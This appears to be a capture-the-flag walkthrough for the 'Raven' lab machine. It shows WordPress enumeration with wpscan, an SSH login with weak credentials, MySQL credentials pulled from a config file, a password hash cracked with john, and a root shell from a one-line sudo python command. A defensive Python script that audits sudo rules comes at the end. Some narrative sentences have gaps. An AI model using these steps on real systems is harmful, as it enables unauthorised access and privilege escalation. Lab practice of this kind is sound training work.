Raven Walkthrough



sudo wpscan --url http://192.168.1.6/wordpress --wp-content-dir wp-content --enumerate







michael@Raven:~$ sudo -l
[sudo] password for michael:
Sorry, user michael may not run sudo on raven.







michael@Raven:~$ find / -perm -4000 -user root 2> /dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs







michael@Raven:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 15731
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>







Some commands that I used to find credentials on the mysql command line:

use [DATABASE]
show tables
show columns from [TABLE]
select [COLUMN] from [TABLE]







$ echo 'steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/' > hash
$ john hash
$ john --show hash
steven:pink84







$ whoami
steven
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python







$ sudo python -c "from os import system;system('/bin/bash')"
root@Raven:/home/steven# whoami
root





First, I need to know Raven's IP address, so I fired up "netdiscover" and got the IP. Then I ran an nmap scan. I can see that the open ports are 22, 80 and 111. I'm starting with port 80 because I don't have any usernames or other useful information to start with SSH. When I connected to it, I saw a good-looking 'Raven Security' website. I tried to find something manually, but this didn't work for me, so I ran nikto.

I'm interested in here withpart. When I navigate todirectory on the website, I got some error, and to handle it I added the website IP to /etc/hosts with the name raven.local. Now I can view the WordPress website correctly. If there is WordPress somewhere, we must think of the wpscan tool.

I think I caught two interesting parts here. First one isand second one is. To exploit the first vulnerability, I used the Metasploit module given on the Rapid7 page. As a result, I spent a lot of time on this part and it gave me nothing.

Now we have two usernames and the SSH port. I used these usernames to log in over SSH and succeeded with the michael:michael creds. Now I'm in the system as michael, so I should find a way to root or steven. I checked the commands that we can run as superuser, but it gave nothing. I checked SUID files, but again it gave nothing. Then I remembered that this machine runs WordPress. If I take a glance at the WordPress config files, maybe I will find something useful. I went to the WordPress directory underand I found the MySQL credential. (If you are curious about finding every flag on the machine, flag2.txt is under thedirectory, I noticed that after much.)

Then,

After that, I ran john to find out steven's password. Later, I used this credential to log in over SSH and I succeeded. It says we can run python as superuser. Let's bypass it and be root.
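
The last step works because a sudo rule for an interpreter is the same as a rule for a root shell. As an added example (not part of the original walkthrough), here is a small Python audit that parses `sudo -l` output and flags rules of that kind; the program list and the last two sample rules are assumptions constructed for illustration.

```python
import os
import re

# Programs that can run arbitrary code or spawn a shell, so a sudo rule for one
# of them is equivalent to full root. Illustrative list, not exhaustive.
SHELL_CAPABLE = {"python", "perl", "ruby", "php", "node", "lua", "bash", "sh",
                 "vi", "vim", "less", "more", "find", "awk", "env", "tar"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")  # "(runas) ..."
TAG_RE = re.compile(r"^(?P<tag>[A-Z_]+):\s*")                      # "NOPASSWD: "


def audit_sudo_listing(text):
    """Flag rules in `sudo -l` output that grant a shell-capable program."""
    findings = []
    for line in text.splitlines():
        rule = RULE_RE.match(line)
        if not rule:
            continue  # Defaults lines, headers, blank lines
        rest, tags = rule.group("rest"), set()
        while (tag := TAG_RE.match(rest)):
            tags.add(tag.group("tag"))
            rest = rest[tag.end():]
        # Simplification: commands are split on plain commas (no "\," escapes).
        for cmd in filter(None, (c.strip() for c in rest.split(","))):
            binary = cmd.split()[0]
            # Strip version suffixes so python2.7 / python3 match "python".
            name = re.sub(r"[\d.]+$", "", os.path.basename(binary))
            if binary == "ALL" or name in SHELL_CAPABLE:
                findings.append({
                    "runas": rule.group("runas").strip(),
                    "command": cmd,
                    "nopasswd": "NOPASSWD" in tags,
                })
    return findings


# First rule is the one from the walkthrough; the other two are constructed.
SAMPLE = """\
User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/sbin/service apache2 restart
    (ALL : ALL) NOPASSWD: /usr/bin/python2.7, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for f in audit_sudo_listing(SAMPLE):
        flag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"[!] ({f['runas']}) {f['command']}  [{flag}]")
```

Rules it flags should be replaced with a fixed command that takes no user-controlled arguments, or removed.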